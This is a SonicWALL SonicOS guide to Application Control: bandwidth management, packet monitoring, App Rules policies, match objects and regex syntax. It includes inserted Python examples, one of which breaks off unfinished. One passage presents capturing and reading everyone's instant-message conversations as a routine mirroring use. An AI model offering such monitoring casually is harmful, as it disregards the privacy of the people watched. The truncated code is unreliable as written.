Based on SonicWALL’s Reassembly Free Deep Packet Inspection technology, Application Control also features intelligent prevention functionality which allows you to create custom, policy-based actions. Examples of custom actions include:

Blocking entire applications based on their signatures
Blocking application features or sub-components
Bandwidth throttling for file types when using the HTTP or FTP protocols
Blocking an attachment
Sending a custom block page
Sending a custom email reply
Redirecting an HTTP request
Sending a custom FTP reply over an FTP control channel

While Application Control primarily provides application level access control, application layer bandwidth management and data leakage prevention, it also includes the ability to create custom application or protocol match signatures. You can create a custom policy with App Rules that matches any protocol you wish, by matching a unique piece of the protocol. See Custom Signature.

Application Control provides excellent functionality for preventing the accidental transfer of proprietary documents. For example, when using the automatic address completion feature of Outlook Exchange, it is a common occurrence for a popular name to complete to the wrong address. See Multiple names completing an address for an example.

Figure: Multiple names completing an address

Benefits of Application Control

Application based configuration makes it easier to configure policies for application control.
The Application Control subscription service provides updated signatures as new attacks emerge.
The related Application Intelligence functionality, as seen in App Flow Monitor and the Real Time Visualization Monitor, is available upon registration as a 30-day free trial App Visualization license. This allows any registered SonicWALL appliance to clearly display information about application traffic in the network. The App Visualization and App Control licenses are also included with the SonicWALL Security Services license bundle.
NOTE: The feature must be enabled in the SonicOS management interface to become active.
You can use the Create Rule button to quickly apply bandwidth management or packet monitoring to an application that you notice while viewing the App Flow Monitor page, or can completely block the application.
You can configure policy settings for individual signatures without influencing other signatures of the same application.
Application Control configuration dialogs are available in the Firewall menu in the SonicOS management interface, consolidating all Firewall and Application Control access rules and policies in the same area.

Application Control functionality can be compared to three main categories of products:

Standalone proxy appliances
Application proxies integrated into firewall VPN appliances
Standalone IPS appliances with custom signature support

Standalone proxy appliances are typically designed to provide granular access control for a specific protocol. SonicWALL Application Control provides granular, application level access control across multiple protocols, including HTTP, FTP, SMTP, and POP3. Because Application Control runs on your SonicWALL firewall, you can use it to control both inbound and outbound traffic, unlike a dedicated proxy appliance that is typically deployed in only one direction. Application Control provides better performance and scalability than a dedicated proxy appliance because it is based on SonicWALL’s proprietary Deep Packet Inspection technology.

Today’s integrated application proxies do not provide granular, application level access control, application layer bandwidth management, and digital rights management functionality. As with dedicated proxy appliances, SonicWALL Application Control provides much higher performance and far greater scalability than integrated application proxy solutions.

While some standalone IPS appliances provide protocol decoding support, none of these products supports granular, application level access control, application layer bandwidth management, and digital rights management functionality.

In comparing Application Control to SonicWALL Email Security, there are benefits to using either. Email Security only works with SMTP, but it has a very rich policy space. Application Control works with SMTP, POP3, HTTP, FTP and other protocols, is integrated into SonicOS on the firewall, and has higher performance than Email Security. However, Application Control does not offer all the policy options for SMTP that are provided by Email Security.

How Does Application Control Work?

Application Control utilizes SonicOS Deep Packet Inspection to scan application layer network traffic as it passes through the gateway and locate content that matches configured applications. When a match is found, these features perform the configured action. When you configure App Control policies, you create global rules that define whether to block or log the application, which users, groups, or IP address ranges to include or exclude, and a schedule for enforcement.

Additionally, you can create App Rules policies that define the type of applications to scan, the direction, the content, keywords, or regular expression to match, optionally the user or domain to match, and the action to perform.

Actions Using Bandwidth Management

Application layer bandwidth management (BWM) allows you to create policies that regulate bandwidth consumption by specific file types within a protocol, while allowing other file types to use unlimited bandwidth. This enables you to distinguish between desirable and undesirable traffic within the same protocol. Application layer bandwidth management is supported for all Application matches, as well as custom App Rules policies using HTTP client, HTTP Server, Custom, and FTP file transfer types. For details about policy types, see App Rules Policy Creation.

Types of BWM

Two types of bandwidth management are available:

Advanced – Bandwidth management can be configured separately for each App Rule.
Global – Configured bandwidth management can be applied globally to all interfaces in all zones.
Setting BWM

Firewall Settings > BWM Page

If the Bandwidth Management Type on the Firewall Settings > BWM page is set to Global, application layer bandwidth management functionality is supported with eight predefined, default BWM priority levels, available when adding a policy from the Firewall > App Rules page. There is also a customizable Bandwidth Management type action, available when adding a new action from the Firewall > Action Objects page.

Bandwidth management can also be configured from the App Flow Monitor page by selecting a service type application or a signature type application and then clicking the Create Rule button. The Bandwidth Management options available there depend on the enabled priority levels in the Global Priority Queue table on the Firewall Settings > BWM page. The priority levels enabled by default are High, Medium, and Low.

All application bandwidth management is tied in with global bandwidth management, which is configured on the Firewall Settings > BWM page.

All App Control dialogs that offer an option for bandwidth management provide a link to the Firewall Settings > BWM page so that you can easily configure global bandwidth management settings for the type and the guaranteed and maximum percentages allowed for each priority level.

TIP: As a best practice, configure the Global Bandwidth Management settings on the Firewall Settings > BWM page before configuring any BWM policies.

Changing the Bandwidth Management Type on the Firewall Settings > BWM page from Advanced to Global disables BWM in all Access Rules. However, the default BWM action objects in App Control policies are converted to the global bandwidth management settings.

When you change the Bandwidth Management Type from Global to Advanced, the default BWM actions that are in use in any App Rules policies are automatically converted to Advanced BWM Medium, no matter what level they were set to before the change.

Default BWM Actions

A number of BWM action options are also available in the predefined, default action list. The BWM action options change depending on the Bandwidth Management Type setting on the Firewall Settings > BWM page. If the Bandwidth Management Type is set to Global, all eight priorities are selectable. If the Bandwidth Management Type is set to Advanced, no priorities are selectable, but the predefined priorities are available when adding a policy.

Default BWM Actions for Adding a Policy shows the predefined default actions that are available when adding a policy.

Default BWM Actions for Adding a Policy

Always Available | If BWM Type = Global | If BWM Type = Advanced
---------------- | -------------------- | ----------------------
Reset / Drop     | 0 – Realtime         | Advanced BWM Low
No Action        | 1 – Highest          | Advanced BWM Medium
Bypass DPI       | 2 – High             | Advanced BWM High
Packet Monitor   | 3 – Medium High      |
                 | 4 – Medium           |
                 | 5 – Medium Low       |
                 | 6 – Low              |
                 | 7 – Lowest           |

When you toggle between Advanced and Global, the default BWM actions are converted to BWM Global-Medium. The firewall does not store your previous priority levels when you switch the type back and forth. You can view the conversions on the Firewall > App Rules page.

Custom BWM Actions

Custom BWM actions behave differently than the default BWM actions. Custom BWM actions are configured by creating action objects on the Firewall > Action Objects page. Custom Bandwidth Management actions, and the policies that use those actions, retain their priority settings whenever the Bandwidth Management Type is toggled between Global and Advanced.

Custom BWM Action in Policy with BWM Type of Global shows the same policy after the global Bandwidth Management Type is set to Global. Only the Priority appears in the tooltip, because no values are set in the Global Priority Queue for guaranteed or maximum bandwidth for level 5.

Custom BWM Action in Policy with BWM Type of Global

Setting BWM Priority

When the Bandwidth Management Type is set to Global, the Add/Edit Action Object dialog provides the Bandwidth Priority option, but uses the values that are specified in the Priority table on the Firewall Settings > BWM page for Guaranteed Bandwidth and Maximum Bandwidth; see Bandwidth Management Type on Firewall Settings > BWM.

Bandwidth Management Type on Firewall Settings > BWM

Add/Edit Action Objects Page with BWM Type Global shows the Bandwidth Priority selections in the Add/Edit Action Objects dialog when the global Bandwidth Management Type is set to Global on the Firewall Settings > BWM page.

Add/Edit Action Objects Page with BWM Type Global

NOTE: All priorities are displayed (Realtime - Lowest) regardless of whether or not they have been configured. Refer to the Firewall Settings > BWM page to determine which priorities are enabled. If the Bandwidth Management Type is set to Global and you select a Bandwidth Priority that is not enabled, the traffic is automatically mapped to the level 4 priority (Medium).
How BWM Configuration Is Handled

Application layer bandwidth management configuration is handled in the same way as Access Rule bandwidth management configuration. Both are tied in with the global bandwidth management settings. However, with Application Control you can specify all content types, which you cannot do with access rules.

For a bandwidth management use case, as an administrator, you might want to limit .mp3 and executable file downloads during work hours to no more than 1 Mbps. At the same time, you want to allow downloads of productive file types such as .doc or .pdf up to the maximum available bandwidth, or even give the highest possible priority to downloads of the productive content. As another example, you might want to limit bandwidth for a certain type of peer-to-peer (P2P) traffic, but allow other types of P2P to use unlimited bandwidth. Application layer bandwidth management allows you to create policies to do this.

NOTE: Guaranteed bandwidth for all levels of BWM combined must not exceed 100%.
Actions Using Packet Monitoring

When the predefined Packet Monitor action is selected for a policy, SonicOS will capture or mirror the traffic according to the settings you have configured on the Dashboard > Packet Monitor or System > Packet Monitor page. The default is to create a capture file, which you can view with Wireshark. Once you have configured a policy with the Packet Monitor action, you still need to click Start Capture on the Packet Monitor page to actually capture any packets. After you have captured the desired packets, click Stop Capture.

To control the Packet Monitor action to capture only the packets related to your policy, click Configure on the Packet Monitor page and select Enable Filter based on the firewall/app rule on the Monitor Filter tab. In this mode, after you click Start Capture on the Packet Monitor page, packets are not captured until some traffic triggers the App Control policy (or Firewall Access Rule). You can see the Alert message in the Log > Log Monitor page when the policy is triggered. This works when Packet Monitor is selected in App Control policies created with the Create Rule button or with the App Rules method using an action object, or in Firewall Access Rules, and allows you to specify configuration or filtering for what to capture or mirror. You can download the capture in different formats and look at it in a Web page, for example.

To set up mirroring, go to the Mirror tab and pick an interface to which to send the mirrored traffic in the Mirror filtered packets to Interface (NSA platforms only) field under Local Mirroring Settings. You can also configure one of the Remote settings. This allows you to mirror the application packets to another computer and store everything on the hard disk. For example, you could capture everyone’s MSN Instant Messenger traffic and read the conversations.

See Configuring Packet Monitor for more information about Packet Monitor configuration.

Create Rule from App Flow Monitor

The Dashboard > App Flow Monitor page provides a Create Rule button. If, while viewing the App Flow Monitor, you see an application that seems suspicious or is using excessive amounts of bandwidth, you can simply select the application in the list, then click Create Rule and configure an App Control policy for it immediately. You can also select multiple applications and then use Create Rule to configure a policy that applies to all of them.

NOTE: General applications cannot be selected. Service type applications and signature type applications cannot be mixed in a single rule.

The following figure shows the Create Rule dialog displayed over the Dashboard > App Flow Monitor page.

Dashboard > App Flow Monitor Page with Create Rule dialog

The Create Rule feature is available in the App Flow Monitor list view. The Create Rule button is visible, but disabled, in the pie chart and graphical monitoring views.

You can configure the following types of policies in the Create Rule dialog:

Block – the application will be completely blocked by the firewall
Bandwidth Manage – choose one of the BWM levels to use Global Bandwidth Management to control the bandwidth used by the application, no matter which interface it traverses
NOTE: Bandwidth management must be enabled on each interface where you want to use it. You can configure interfaces from the Network > Interfaces page.
Packet Monitor – capture packets from the application for examination and analysis

After you select the desired action for the rule and then click Create Rule within the Create Rule dialog, an App Control policy is automatically created and added to the App Rules Policies table on the Firewall > App Rules page.

The Create Rule dialog contains a Configure button next to the Bandwidth Manage section that takes you to the Firewall Settings > BWM page where you can configure the Global Priority Queue. For more information about global bandwidth management and the Firewall Settings > BWM page, see the Actions Using Bandwidth Management. The Bandwidth Manage options you see in the Create Rule dialog reflect the options that are enabled in the Global Priority Queue. The default values are:

BWM Global-High – Guaranteed 30%; Max/Burst 100%
BWM Global-Medium – Guaranteed 50%; Max/Burst 100%
BWM Global-Low – Guaranteed 20%; Max/Burst 100%
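
As an added example (not SonicOS code), the following Python models the Global Priority Queue rules stated in this section: the eight priority levels with the default High/Medium/Low percentages, the rule that combined guaranteed bandwidth must not exceed 100%, the mapping of a disabled Bandwidth Priority to level 4 (Medium), and the conversion of default BWM actions to Medium when the Bandwidth Management Type is toggled while custom BWM action objects keep their priority. The Level dataclass, the policy tuples and the "Max/Burst not below guaranteed" check are assumptions of the example.

```python
from dataclasses import dataclass

# The eight Global BWM priority levels named on this page.  Traffic for a
# Bandwidth Priority that is not enabled is mapped to level 4 (Medium).
PRIORITY_NAMES = ["Realtime", "Highest", "High", "Medium High",
                  "Medium", "Medium Low", "Low", "Lowest"]
FALLBACK_LEVEL = 4


@dataclass
class Level:
    """One row of the Global Priority Queue (representation assumed by this example)."""
    enabled: bool = False
    guaranteed: int = 0        # percent of the interface bandwidth
    maximum: int = 100         # Max/Burst, percent


def default_global_queue():
    """The page's defaults: High 30%, Medium 50%, Low 20%, all Max/Burst 100%."""
    queue = {lvl: Level() for lvl in range(8)}
    queue[2] = Level(True, 30, 100)    # BWM Global-High
    queue[4] = Level(True, 50, 100)    # BWM Global-Medium
    queue[6] = Level(True, 20, 100)    # BWM Global-Low
    return queue


def validate_queue(queue):
    """Return the problems in a Global Priority Queue; an empty list means it is acceptable."""
    problems = []
    total = sum(l.guaranteed for l in queue.values() if l.enabled)
    if total > 100:                    # the page's rule: combined guaranteed bandwidth <= 100%
        problems.append(f"guaranteed bandwidth totals {total}%, which exceeds 100%")
    for lvl, l in queue.items():       # assumption: Max/Burst cannot be below guaranteed
        if l.enabled and l.maximum < l.guaranteed:
            problems.append(f"{PRIORITY_NAMES[lvl]}: max {l.maximum}% is below guaranteed {l.guaranteed}%")
    return problems


def effective_level(queue, requested):
    """Level at which traffic matched by an action with Bandwidth Priority `requested` is queued."""
    return requested if queue[requested].enabled else FALLBACK_LEVEL


def toggle_bwm_type(policies):
    """Model a Global <-> Advanced toggle: default BWM actions are reset to Medium,
    custom BWM action objects keep their priority.  `policies` maps a policy name to
    ("default" | "custom", level); that representation is an assumption of this example."""
    return {name: (kind, FALLBACK_LEVEL if kind == "default" else level)
            for name, (kind, level) in policies.items()}
```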
App Control Advanced Policy Creation

The configuration method on the Firewall > App Control Advanced page allows granular control of specific categories, applications, or signatures. This includes granular logging control, granular inclusion and exclusion of users, groups, or IP address ranges, and schedule configuration. The settings here are global policies and independent from any custom App Rules policy.

You can configure the following settings on this page:

Select a category, an application, or a signature.
Select blocking, logging, or both as the action.
Specify users, groups, or IP address ranges to include in or exclude from the action.
Set a schedule for enforcing the controls.

While these application control settings are independent from App Rules policies, you can also create application match objects for any of the categories, applications, or signatures available here or on the Firewall > Match Objects page, and use those match objects in an App Rules policy. This allows you to use the wide array of actions and other configuration settings available with Application Control. See Application List Objects for more information about this policy-based user interface for application control.

App Rules Policy Creation

You can use Application Control to create custom App Rules policies to control specific aspects of traffic on your network. A policy is a set of match objects, properties, and specific prevention actions. When you create a policy, you first create a match object, then select and optionally customize an action, then reference these when you create the policy.

In the Firewall > App Rules page, you can access the Policy Settings dialog, shown below, for a Policy Type of SMTP Client. The screen changes depending on the Policy Type you select.

Some examples of policies include:

Block applications for activities such as gambling
Disable .exe and .vbs email attachments
Do not allow the Mozilla browser on outgoing HTTP connections
Do not allow outgoing email or MS Word attachments with the keywords SonicWALL Confidential, except from the CEO and CFO
Do not allow outgoing email that includes a graphic or watermark found in all confidential documents

When you create a policy, you select a policy type. Each policy type specifies the values or value types that are valid for the source, destination, match object type, and action fields in the policy. You can further define the policy to include or exclude specific users or groups, select a schedule, turn on logging, and specify the connection side as well as basic or advanced direction types. A basic direction type simply indicates inbound or outbound. An advanced direction type allows zone to zone direction configuration, such as from the LAN to the WAN.

App Rules: Policy Type Characteristics describes the characteristics of the available App Rules policy types.

App Rules: Policy Type Characteristics

Policy Type | Description | Valid Source Service / Default | Valid Destination Service / Default | Valid Match Object Type | Valid Action Type | Connection Side
--- | --- | --- | --- | --- | --- | ---
App Control Content | Policy using dynamic Application Control related objects for any application layer protocol | N/A | N/A | Application Category List, Application List, Application Signature List | Reset/Drop, No Action, Bypass DPI, Packet Monitor, BWM Global-*, WAN BWM * | N/A
CFS | Policy for content filtering | N/A | N/A | CFS Category List | CFS Block Page, Packet Monitor, No Action, BWM Global-*, WAN BWM * | N/A
Custom Policy | Policy using custom objects for any application layer protocol; can be used to create IPS-style custom signatures | Any / Any | Any / Any | Custom Object | Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM * | Client Side, Server Side, Both
FTP Client | Any FTP command transferred over the FTP control channel | Any / Any | FTP Control / FTP Control | FTP Command, FTP Command + Value, Custom Object | Reset/Drop, Bypass DPI, Packet Monitor, No Action | Client Side
FTP Client File Upload Request | An attempt to upload a file over FTP (STOR command) | Any / Any | FTP Control / FTP Control | Filename, file extension | Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM * | Client Side
FTP Client File Download Request | An attempt to download a file over FTP (RETR command) | Any / Any | FTP Control / FTP Control | Filename, file extension | Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM * | Client Side
FTP Data Transfer Policy | Data transferred over the FTP Data channel | Any / Any | Any / Any | File Content Object | Reset/Drop, Bypass DPI, Packet Monitor, No Action | Both
HTTP Client | Policy which is applicable to Web browser traffic or any HTTP request that originates on the client | Any / Any | Any / HTTP (configurable) | HTTP Host, HTTP Cookie, HTTP Referrer, HTTP Request Custom Header, HTTP URI Content, HTTP User Agent, Web Browser, File Name, File Extension Custom Object | Reset/Drop, Bypass DPI, Packet Monitor (1), No Action, BWM Global-*, WAN BWM * | Client Side
HTTP Server | Response originated by an HTTP Server | Any / HTTP (configurable) | Any / Any | ActiveX Class ID, HTTP Set Cookie, HTTP Response, File Content Object, Custom Header, Custom Object | Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM * | Server Side
IPS Content | Policy using dynamic Intrusion Prevention related objects for any application layer protocol | N/A | N/A | IPS Signature Category List, IPS Signature List | Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM * | N/A
POP3 Client | Policy to inspect traffic generated by a POP3 client; typically useful for a POP3 server admin | Any / Any | POP3 (Retrieve Email) / POP3 (Retrieve Email) | Custom Object | Reset/Drop, Bypass DPI, Packet Monitor, No Action | Client Side
POP3 Server | Policy to inspect email downloaded from a POP3 server to a POP3 client; used for email filtering | POP3 (Retrieve Email) / POP3 (Retrieve Email) | Any / Any | Email Body, Email CC, Email From, Email To, Email Subject, File Name, File Extension, MIME Custom Header | Reset/Drop, Disable attachment, Bypass DPI, No action | Server Side
SMTP Client | Policy applies to SMTP traffic that originates on the client | Any / Any | SMTP (Send Email) / SMTP (Send Email) | Email Body, Email CC, Email From, Email To, Email Size, Email Subject, Custom Object, File Content, File Name, File Extension, MIME Custom Header | Reset/Drop, Block SMTP E-Mail Without Reply, Bypass DPI, Packet Monitor, No Action | Client Side

(1) The Packet Monitor action is not supported for File Name or File Extension Custom Object.

Match Objects

Match objects represent the set of conditions which must be matched in order for actions to take place. This includes the object type, the match type (exact, partial, regex, prefix, or suffix), the input representation (text or hexadecimal), and the actual content to match. Match objects were referred to as application objects in previous releases.

Hexadecimal input representation is used to match binary content such as executable files, while alphanumeric (text) input representation is used to match things like file or email content. You can also use hexadecimal input representation for binary content found in a graphic image. Text input representation could be used to match the same graphic if it contains a certain string in one of its properties fields. Regular expressions (regex) are used to match a pattern rather than a specific string or value, and use alphanumeric input representation.

The File Content match object type provides a way to match a pattern or keyword within a compressed (zip/gzip) file. This type of match object can only be used with FTP Data Transfer, HTTP Server, or SMTP Client policies.

Supported Match Object Types describes the supported match object types.

Supported Match Object Types

Object Type | Description | Match Types | Negative Matching | Extra Properties
--- | --- | --- | --- | ---
ActiveX ClassID | Class ID of an Active-X component. For example, the ClassID of the Gator Active-X component is “c1fb8842-5281-45ce-a271-8fd5f117ba5f” | Exact | No | None
Application Category List | Allows specification of application categories, such as Multimedia, P2P, or Social Networking | N/A | No | None
Application List | Allows specification of individual applications within the application category that you select | N/A | No | None
Application Signature List | Allows specification of individual signatures for the application and category that you select | N/A | No | None
CFS Allow/Forbidden List | Allows specification of allowed and forbidden domains for Content Filtering | Exact, Partial, Regex, Prefix, Suffix | No | None
CFS Category List | Allows selection of one or more Content Filtering categories | N/A | No | A list of 64 categories is provided to choose from
Custom Object | Allows specification of an IPS-style custom set of conditions | Exact, Regex | No | Four additional, optional parameters can be set: offset (the byte in the packet payload at which matching starts; counted from 1; helps minimize false positives), depth (the byte in the packet payload at which matching stops; counted from 1), minimum payload size, and maximum payload size
Email Body | Any content in the body of an email | Partial, Regex | No | None
Email CC (MIME Header) | Any content in the CC MIME header | Exact, Partial, Regex, Prefix, Suffix | Yes | None
Email From (MIME Header) | Any content in the From MIME header | Exact, Partial, Regex, Prefix, Suffix | Yes | None
Email Size | Allows specification of the maximum email size that can be sent | N/A | No | None
Email Subject (MIME Header) | Any content in the Subject MIME header | Exact, Partial, Regex, Prefix, Suffix | Yes | None
Email To (MIME Header) | Any content in the To MIME header | Exact, Partial, Regex, Prefix, Suffix | Yes | None
MIME Custom Header | Allows for creation of MIME custom headers | Exact, Partial, Regex, Prefix, Suffix | Yes | A custom header name needs to be specified
File Content | Allows specification of a pattern to match in the content of a file. The pattern is matched even if the file is compressed | Partial, Regex | No | The ‘Disable attachment’ action should never be applied to this object
File Name | In email, the attachment name. In HTTP, the filename of an attachment uploaded to a Web mail account. In FTP, the filename of an uploaded or downloaded file | Exact, Partial, Regex, Prefix, Suffix | Yes | None
File Extension | In email, the attachment filename extension. In HTTP, the filename extension of an attachment uploaded to a Web mail account. In FTP, the filename extension of an uploaded or downloaded file | Exact | Yes | None
FTP Command | Allows selection of specific FTP commands | N/A | No | None
FTP Command + Value | Allows selection of specific FTP commands and their values | Exact, Partial, Regex, Prefix, Suffix | Yes | None
HTTP Cookie | Allows specification of a Cookie sent by a browser | Exact, Partial, Regex, Prefix, Suffix | Yes | None
HTTP Host | Content found inside the HTTP Host header; the hostname of the destination server in the HTTP request, such as www.google.com | Exact, Partial, Regex, Prefix, Suffix | Yes | None
HTTP Referer | Content of the Referer header sent by a browser; useful to control, or keep statistics of, which Web sites redirected a user to the customer’s Web site | Exact, Partial, Regex, Prefix, Suffix | Yes | None
HTTP Request Custom Header | Allows handling of custom HTTP Request headers | Exact, Partial, Regex, Prefix, Suffix | Yes | A custom header name needs to be specified
HTTP Response Custom Header | Allows handling of custom HTTP Response headers | Exact, Partial, Regex, Prefix, Suffix | Yes | A custom header name needs to be specified
HTTP Set Cookie | Set-Cookie headers. Provides a way to disallow certain cookies from being set in a browser | Exact, Partial, Regex, Prefix, Suffix | Yes | None
HTTP URI Content | Any content found inside the URI in the HTTP request | Exact, Partial, Regex, Prefix, Suffix | No | None
HTTP URL | Any content found in the URL | Exact, Partial, Regex, Prefix, Suffix | No | None
HTTP User-Agent | Any content inside a User-Agent header. For example: User-Agent: Skype | Exact, Partial, Regex, Prefix, Suffix | Yes | None
Web Browser | Allows selection of specific Web browsers (MSIE, Netscape, Firefox, Safari, Chrome) | N/A | Yes | None
IPS Signature Category List | Allows selection of one or more IPS signature groups. Each group contains multiple predefined IPS signatures | N/A | No | None
IPS Signature List | Allows selection of one or more specific IPS signatures for enhanced granularity | N/A | No | None

You can see the available types of match objects in a drop-down menu in the Match Object Settings dialog.

In the Match Object Settings dialog, you can add multiple entries to create a list of content elements to match. All content that you provide in a match object is case-insensitive for matching purposes. A hexadecimal representation is used to match binary content. You can use a hex editor or a network protocol analyzer like Wireshark to obtain the hex format of binary files.

You can use the Load From File button to import content from predefined text files that contain multiple entries for a match object to match. Each entry in the file must be on its own line. The Load From File feature allows you to easily move Application Control settings from one SonicWALL security appliance to another.

Multiple entries, either from a text file or entered manually, are displayed in the List area. List entries are matched using the logical OR, so if any item in the list is matched, the action for the policy is executed.

A match object can include a total of no more than 8000 characters. If each element within a match object contains approximately 30 characters, then you can enter about 260 elements. The maximum element size is 8000 bytes.

Regular Expressions

You can configure regular expressions in certain types of match objects for use in App Rules policies. The Match Object Settings page provides a way to configure custom regular expressions or to select from predefined regular expressions. The SonicWALL implementation supports reassembly-free regular expression matching on network traffic. This means that no buffering of the input stream is required, and patterns are matched across packet boundaries.

SonicOS 5.9 provides these predefined regular expressions:

Name | Description
--- | ---
VISA CC | VISA Credit Card Number
US SSN | United States Social Security Number
CANADIAN SIN | Canadian Social Insurance Number
ABA ROUTING NUMBER | American Bankers Association Routing Number
AMEX CC | American Express Credit Card Number
MASTERCARD CC | Mastercard Credit Card Number
DISCOVER CC | Discover Credit Card Number

Policies using regular expressions will match the first occurrence of the pattern in network traffic. This enables actions on matches as soon as possible. Because matching is performed on network traffic and not only on human-readable text, the matchable alphabet includes the entire ASCII character set – all 256 characters.

Popular regular expression primitives such as ‘.’ (the any-character wildcard), ‘*’, ‘?’, ‘+’, repetition counts, alternation, and negation are supported. Though the syntax and semantics are similar to popular regular expression implementations such as Perl, vim, and others, there are some minor differences. For example, the beginning of line (^) and end of line ($) operators are not supported. Also, ‘\z’ refers to the set of non-zero digits, [1-9], not to the end of the string as in Perl. For syntax information, see Regular Expression Syntax.

One notable difference with the Perl regular expression engine is the lack of back-reference and substitution support. These features are actually extraneous to regular expressions and cannot be accomplished in linear time with respect to the data being examined. Hence, to maintain peak performance, they are not supported. Substitution or translation functionality is not supported because network traffic is only inspected, not modified.

Predefined regular expressions for frequently used patterns such as U.S. social security numbers and VISA credit card numbers can be selected while creating the match object. Users can also write their own expressions in the same match object. Such user provided expressions are parsed, and any that do not parse correctly will cause a syntax error to display at the bottom of the Match Object Settings window. After successful parsing, the regular expression is passed to a compiler to create the data structures necessary for scanning network traffic in real time.

Building a DFA

Regular expressions are matched efficiently by building a data structure called a Deterministic Finite Automaton (DFA). The DFA’s size is dictated by the regular expression provided by the user and is constrained by the memory capacity of the device. A lengthy compilation process for a complex regular expression can consume extensive amounts of memory on the appliance. It may also take up to two minutes to build the DFA, depending on the expressions involved.

To prevent abuse and denial-of-service attacks, along with excessive impact to appliance management responsiveness, the compiler can abort the process and reject regular expressions that cause this data structure to grow too big for the device. An “abuse encountered” error message is displayed at the bottom of the window.

NOTE: During a lengthy compilation, the appliance management session may become temporarily unresponsive, while network traffic continues to pass through the appliance.

Building the DFA for expressions containing large counters consumes more time and memory. Such expressions are more likely to be rejected than those that use indefinite counters such as the ‘*’ and ‘+’ operators.

Also at risk of rejection are expressions containing a large number of characters rather than a character range or class. That is, the expression ‘(a|b|c|d|. . .|z)’ to specify the set of all lower-case letters is more likely to be rejected than the equivalent character class ‘\l’. When a range such as ‘[a-z]’ is used, it is converted internally to ‘\l’. However, a range such as ‘[d-y]’ or ‘[0-Z]’ cannot be converted to any character class, is long, and may cause the rejection of the expression containing this fragment.

Whenever an expression is rejected, you can rewrite it more efficiently using the tips above to avoid rejection. For syntax information, see Regular Expression Syntax. For an example discussing how to write a custom regular expression, see Creating a Regular Expression in a Match Object.

Regular Expression Syntax

The following tables show the syntax used in building regular expressions.

Syntax of Regular Expressions: Single Characters

Representation | Definition
--- | ---
. | Any character except ‘\n’. Use the /s (stream mode, also known as single-line mode) modifier to match ‘\n’, too.
[xyz] | Character class. Can also contain escaped characters. Special characters do not need to be escaped, as they have no special meaning within brackets [ ].
[^xyz] | Negated character class.
\xdd | Hex input. “dd” is the hexadecimal value for the character. Two digits are mandatory. For example, \r is \x0d and not \xd.
[a-z][0-9] | Character range.

Syntax of Regular Expressions: Composites

Representation | Definition
--- | ---
xy | x followed by y
‘x|y’ | x or y
(x) | Equivalent to x. Can be used to override precedence.

Syntax of Regular Expressions: Repetitions

Representation | Definition
--- | ---
x* | Zero or more x
x? | Zero or one x
x+ | One or more x
x{n, m} | Minimum of n and a maximum of m sequential x’s. All numbered repetitions are expanded, so making m unreasonably large is ill-advised.
x{n} | Exactly n x’s
x{n,} | Minimum of n x’s
x{,n} | Maximum of n x’s

Syntax of Regular Expressions: Escape Sequences

Representation | Definition
--- | ---
\0, \a, \b, \f, \t, \n, \r, \v | ‘C’ programming language escape sequences (\0 is the NULL character [ASCII character zero])
\x | Hex input. \x followed by two hexadecimal digits denotes the hexadecimal value for the intended character.
\*, \?, \+, \(, \), \[, \], \{, \}, \\, \/, \<space>, \# | Escape any special character.

NOTE: Comments that are not processed are preceded by any number of spaces and a pound sign (#). So, to match a space or a pound sign (#), you must use the escape sequences \<space> and \#.

Perl-Like Character Classes

Representation | Definition
--- | ---
\d, \D | Digits, non-digits.
\z, \Z | Non-zero digits ([1-9]), all other characters.
\s, \S | White space, non-white space. Equivalent to [\t\n\f\r]. \v is not included in Perl white space.
\w, \W | Word characters ([0-9A-Za-z_]), non-word characters.

Other ASCII Character Class Primitives

If you want... | ... then use | Definition
--- | --- | ---
[:cntrl:] | \c, \C | Control character. [\x00 - \x1F\x7F]
[:digit:] | \d, \D | Digits, non-digits. Same as the Perl character class.
[:graph:] | \g, \G | Any printable character except space.
[:xdigit:] | \h, \H | Any hexadecimal digit. [a-fA-F0-9]. NOTE: This differs from the Perl \h, which means a horizontal space.
[:lower:] | \l, \L | Any lower case character
[:ascii:] | \p, \P | Positive, negative ASCII characters. [0x00 – 0x7F], [0x80 – 0xFF]
[:upper:] | \u, \U | Any upper case character

Some of the other popular character classes can be built from the above primitives. The following classes do not have their own shorthand because none of the remaining characters make a good mnemonic for them.

Compound Character Classes

If you want... | ... then use | Definition
--- | --- | ---
[:alnum:] | [\l\u\d] | The set of all letters and digits.
[:alpha:] | [\l\u] | The set of all letters.
[:blank:] | [\t<space>] | The class of blank characters: tab and space.
[:print:] | [\g<space>] | The class of all printable characters: all graphical characters including space.
[:punct:] | [^\P\c<space>\d\u\l] | The class of all punctuation characters: no negative ASCII characters, no control characters, no space, no digits, no upper or lower case characters.
[:space:] | [\s\v] | All white space characters. Includes Perl white space and the vertical tab character.

Modifiers

Representation | Definition
--- | ---
/i | Case-insensitive
/s | Treat input as single-line. Can also be thought of as stream mode. That is, ‘.’ matches ‘\n’, too.

Operators in Decreasing Order of Precedence

Operators | Associativity
--- | ---
[ ], [^ ] | Left to right
( ) | Left to right
*, +, ? | Left to right
xy (Concatenation) | Left to right
‘|’ (Alternation) | Left to right

Comments

SonicOS supports comments in regular expressions. Comments are preceded by any number of spaces and a pound sign (#). All text after a space and pound sign is discarded until the end of the expression.
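As an added example (not part of the SonicOS documentation), the following Python translator rewrites the SonicOS-specific shorthand classes from the tables above into plain Python re character classes, discards a trailing comment and maps the /i and /s modifiers, so that a match-object pattern can be tested against a sample payload before it is deployed. The function names, the choice to compile patterns as bytes, and passing modifiers as a separate string are assumptions made for the example.

```python
"""Test SonicOS App Rules regex patterns offline with Python's re module.

Added example, not SonicOS code. SonicOS shorthand such as \\h (hex digit),
\\z (non-zero digit) and \\p (ASCII) either does not exist in Python or means
something else there (Python's \\Z is end-of-string), so a pattern has to be
translated before it can be exercised against sample payloads.
"""
import re

# SonicOS shorthand -> (characters to place inside a [...] class, negated?).
# Ranges follow the definitions in the tables above; \d, \s and \w are left
# to Python (caveat: Python's \s also matches \v, the SonicOS \s does not).
_CLASSES = {
    "z": ("1-9", False), "Z": ("1-9", True),                        # non-zero digits
    "c": (r"\x00-\x1f\x7f", False), "C": (r"\x00-\x1f\x7f", True),  # [:cntrl:]
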